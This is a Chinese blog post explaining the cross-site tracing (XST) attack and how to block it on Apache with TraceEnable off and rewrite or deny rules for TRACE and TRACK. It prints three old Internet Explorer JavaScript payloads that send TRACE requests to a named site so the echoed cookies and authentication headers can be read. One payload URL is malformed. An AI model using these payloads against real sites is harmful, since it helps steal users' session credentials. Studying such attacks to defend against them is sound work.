cross-site tracing XST攻击

最新推荐文章于 2021-03-14 21:18:11 发布
最新推荐文章于 2021-03-14 21:18:11 发布
阅读量3.4k 收藏 4
点赞数
分类专栏: 漏洞异常

XST攻击描述:
攻击者将恶意代码嵌入一台已经被控制的主机上的web文件,当访问者浏览时恶意代码在浏览器中执行,然后访问者的cookie、http基本验证以及ntlm验证信息将被发送到已经被控制的主机,同时传送Trace请求给目标主机,导致cookie欺骗或者是中间人攻击。

XST攻击条件:
1、需要目标web服务器允许Trace参数;
2、需要一个用来插入XST代码的地方; 
3、目标站点存在跨域漏洞。

XST与XSS的比较:
相同点:都具有很大的欺骗性,可以对受害主机产生危害,而且这种攻击是多平台多技术的,我们还可以利用Active控件、Flash、Java等来进行XST和XSS攻击。
优点:可以绕过一般的http验证以及NTLM验证

如何利用:

手法1:
<SCRIPT type=text/java script>
<!--
function xssTRACE(){
var xmlHttp=new ActiveXObject(\"Microsoft.XMLHTTP\");
xmlHttp.open(\"TRACE\",\"http://wmjie.51.net/swords/\",false);
xmlHttp.send();
xmlDoc=xmlHttp.responseText;
alert(xmlDoc);
}

//-->
</SCRIPT>
<BR><INPUT onclick=xssTRACE(); type=button value=\"XSS TRACE\">

手法2:
<SCRIPT type=text/java script>
<!--
function xssTRACE() {
var openWin=open(\"blank.htm\",\"swords\",\"width=500,height=400\");
var otraceswords=openWin.external;
openWin.location.href=\"http://wmjie.51.net/swords/\";
setTimeout(
function () {
//以下必须写在一行
otraceswords.NavigateAndFind('java script:xmlHttp=new ActiveXObject(\"Microsoft.XMLHTTP\");xmlHttp.open(\"TRACE\",\"http://wmjie.51.net/swords/\",false);xmlHttp.send();xmlDoc=xmlHttp.responseText;alert(\"不用document.cookie 显示站点wmjie.51.net/swords/ 的头信息。\\n\" + xmlDoc);',\"\",\"\");
},
1024
);
}
//-->
</SCRIPT>
<BR><INPUT onclick=xssTRACE(); type=button value=\"XSS TRACE\">

手法3:
<SCRIPT type=text/java script>
function xssTRACE(){
var swords = \"var xmlHttp = new ActiveXObject(\\"Microsoft.XMLHTTP\\")\;xmlHttp.open(\\"TRACE\\",\\"http://http://www.tingh.com/\\",false)\;xmlHttp.send()\;xmlDoc=xmlHttp.responseText\;alert(xmlDoc)\;\";
var target = \"http://wmjie.51.net/swords/\";
spinach = encodeURIComponent(swords + ';top.close()');
var readyCode = 'font-size:expression(execScript(decodeURIComponent(\"' + spinach + '\")))';
showModalDialog(target, null, readyCode);
}
</SCRIPT>
<BR><INPUT onclick=xssTRACE() type=button value=\"XSS TRACE\">


预防http Trace方法跨站攻击


方法一:

Apache版本大于2.2,在httpd.conf中添加以下一段即可:

TraceEnable off(建议使用的方法,简单明了,唯一需要注意apache的版本)

方法二:

如果一台 Web Server 支持 Trace 和 / 或 Track 方式,那么它一定存在跨站脚本漏洞,将有可能受到跨站攻击。 Trace 和 Track 是用来调试 Web 服务器连接的 HTTP 方式。

我们通常在描述各种浏览器缺陷的时候,把“Cross-Site-Tracing”(跨站攻击)简称为 XST。

攻击者可以利用此漏洞欺骗合法用户并得到他们的私人信息。

解决方案:禁用 Trace 和 / 或 Track 方式。

针对 Apache,可以借助 mod_rewrite 模块来禁止 HTTP Trace 请求。只要在各虚拟主机的配置文件里添加如下语句:

RewriteEngine on
RewriteCond %{REQUEST_METHOD} ^(TRACE|TRACK)
RewriteRule .* – [F]

需要在安装apache的时候编译mod_rewrite 。

方法三:(未测试)

另外可以这么做:
SetEnvIfNoCase Request_Method ^(TRACE|TRACK) IS_TRACE
<Directory /dir>
Order Allow,Deny
Allow from all
Deny from env=IS_TRACE
</Directory>


Xysoul
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
web渗透--26--服务器端包含注入(SSI注入)
武天旭的博客
09-16 2786
1、漏洞描述: Web服务器通常允许开发人员在静态HTML页面内嵌入少量的动态代码,而无需处理全部的服务器端或客户端语言。这个特征称作:服务器端包含(SSI)。在SSI注入测试中,我们测试能否注入可由SSI机制解释的应用程序数据。该漏洞的成功利用允许攻击者在HTML页面中插入代码,甚至实施远程代码执行。
Cross Site Tracing (XST) Attacks(跨站跟踪攻击)练习详细步骤(WebGoat5.4)
软件生命周期中的攻防博弈
08-28 2102
由于对web编程不是很熟悉,谨以此文分享给学习WebGoat但是web编程底子不好的小伙伴。 HTTP的Method中有专为调试Web Server连接的(TRACE/TRACK),但正式上线运行的WebServer如果支持Trace/Track方式,则一定存在跨站攻击漏洞。RFC 2616 for HTTP 如下定义 TRACE 方法,“此方法用于调用已请求消息的远程、应用层回送(
【35】WEB安全学习----XST攻击
尚未佩妥剑 转眼便江湖
10-09 2176
本章为知识扩充部分,此攻击现浏览器已不支持发送TRACE请求,故只需要了解攻击原理即可。 XST攻击原理 "Cross-Site-Tracing"简称为XST,如果开发者在设置cookie属性时配置了httponly属性,那么通过XSS攻击就无法读取cookie数据,那么如果服务器支持TRACE请求并且允许跨域的话,那么还是可以读取到cookie数据的。 要想理解XST攻击,首先需要了解以下...
古老的xst攻击
标子 的专栏
08-25 3077
xst主要是使用http的trace方法,该方法会返回浏览器发给服务器的所有请求信息,但该方法不能带body,主要是利于debug。 现在前端后端都做了很多xst攻击的措施,很难在浏览器端发起trace请求了,所以只能用fiddler模拟一下,服务器是wamp,支持trace方法。 该攻击主要是在网站存在xss漏洞但设置了cookie的httponly属性的时候结合trace方法进行攻击。如果
浅谈“跨站跟踪攻击(即CST/XST攻击)”
→_→
05-23 1782
漏洞名称: Cross-Site-Tracing"简称为 CST / XST-跨站式追踪攻击 描述: 攻击者将恶意代码嵌入一台已经被控制的主机上的web文件,当访问者浏览时恶意代码在浏览器中执行,然后访问者的cookie、http基本验证以及ntlm验证信息将被发送到已经被控制的主机,同时传送Trace请求给目标主机,导致cookie欺骗或者是中间人攻击。 检测条件: 需要目标 Web 服务器允许接受 Trace、Track 方法的请求。 客户端可以发送 Trace、Track..
XSS攻击原理和解决方法
芦金宇的专栏
09-23 1208
概述 XSS攻击是Web攻击中最常见的攻击方法之一,它是通过对网页注入可执行代码且成功地被浏览器 执行,达到攻击的目的,形成了一次有效XSS攻击,一旦攻击成功,它可以获取用户的联系人列表,然后向联系人发送虚假诈骗信息,可以删除用户的日志等等,有时候还和其他攻击方式同时实 施比如SQL注入攻击服务器和数据库、Click劫持、相对链接劫持等实施钓鱼,它带来的危害是巨 大的,是web安全的头号大敌。 ...
Cross Site Tracing (XST) Attacks
OOM
07-30 3741
转载自:http://forum.eviloctal.com/thread-12959-1-1.html XST攻击属于XSS攻击的一种。 XST攻击描述: 攻击者将恶意代码嵌入一台已经被控制的主机上的web文件,当访问者浏览时恶意代码在浏览器中执行,然后访问者的cookie、http基本验证以及htlm验证信息将被发送到已经被控制的主机,同时传送Trace请求给目标主机,导致cookie欺
nginx-opentracing:用于OpenTracing的NGINX插件
04-29
nginx-opentracing 启用nginx服务的请求以通过进行分布式跟踪。依存关系C ++ OpenTracing跟踪器。 目前,它可与 , , 或。 源代码。安装对于linux-x86_64 ,为受支持的NGINX版本提供了预编译的二进制文件。 如果...
zipkin-php-opentracing:OpenTracing API的Zipkin实现
05-27
该库允许OpenTracing API使用者将Zipkin用作其跟踪后端。 有关如何使用跨度和轨迹的详细信息,建议您阅读中的文档和自述文件。 入门 必读 为了理解OpenTracing API,必须首先更全面地熟悉和。 要了解Zipkin的工作...
zipkin-go-opentracing:Zipkin Go的OpenTracing
02-03
"github.com/opentracing/opentracing-go" "github.com/openzipkin/zipkin-go" zipkinhttp "github.com/openzipkin/zipkin-go/reporter/http" zipkinot "github.com/openzipkin-contrib/zipkin-go-op
brave-opentracing-1.0.0.jar
05-31
Zipkin OpenTracing 勇敢的桥 io.opentracing.brave/brave-opentracing/1.0.0/brave-opentracing-1.0.0.jar
egg-opentracing-zipkin:向Egg.js中的zipkin服务器报告跟踪信息
05-09
安装$ npm i egg-opentracing-zipkin --save用法egg-opentracing-zipkin取决于 ,您应该启用这些插件。 // {app_root}/config/plugin.jsexports . opentracing = { enable : true , package : 'egg-opentracing' ,} ...
WebGoat学习笔记(六)——Cross Site Tracing(XST) Attacks
走走停停
11-18 1356
JS Post Url
渗透测试学习18:前端安全补充
weixin_44315099的博客
03-14 176
目录AJAX扩展CORS跨域资源共享简述CORS大致流程CORS相关安全问题origin校验绕过检验方法CRLF注入(HTTP响应拆分)XST(Cross Site Tracing ) AJAX扩展 AJAX:Asynchronous JavaScript AND XML,全称是异步的Javascript和XML。是指⼀种创建交互式、快速动态网页应⽤的网页开发技术,无需重新加载整个网页的情况下,能够更新部分网页的技术。 异步: 传统的网页(不使用 AJAX)如果需要更新内容,必需重载整个网页。 通过在后台
5 XSS Exploits You Should Know About
kezhen的专栏
04-12 1650
http://deadlytechnology.com/web-development/xss/
WebGoat实验之Cross-Site Scripting(XSS,跨站脚本攻击)- 2016.01.09
baishileily的博客
01-09 4822
XSS(Cross-Site Scripting)跨站脚本攻击,由于 html 和 js 都是解释执行的,那么如果对用户的输入过滤不够严格或者说不严格处理,那么当用户也输入一些 html 或者 js 的并被浏览器再次加载的时候也是可以被浏览器解释执行的。那么对于一些博客、贴吧等存在用户输入、又存在游客查看评论的地方,做好用户输入的过滤就很有必要。那么 XSS 能干什么呢?不仅可以用来进行钓鱼攻击
ecshop 跨站攻击
dzl4384的博客
08-29 131
ecshop的err.log一直报这个错误 [Wed Aug 29 13:45:24 2012] [error] [client 113.118.3.138] script '/var/www/html/ecshop/images/upload/Image/search.php' not found or unable to stat, referer:http://image.baidu.co...
【转】XST Strikes Back
zbryan的专栏
01-15 135
Amit Klein, January 2006 Introduction ============ About three years ago, the concept of &quot;Cross Site Tracing&quot; [1] was introduced to the web application security community. In esse...
XST攻击和 XSS 攻击有何异同?
最新发布
05-12
XST攻击(Cross-Site Tracing)则是一种利用HTTP TRACE请求方法的攻击方式。攻击者通过构造HTTP TRACE请求,将恶意脚本注入到响应中,当其他用户访问该网站时,恶意脚本就会在其浏览器中执行,从而达到窃取用户信息...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值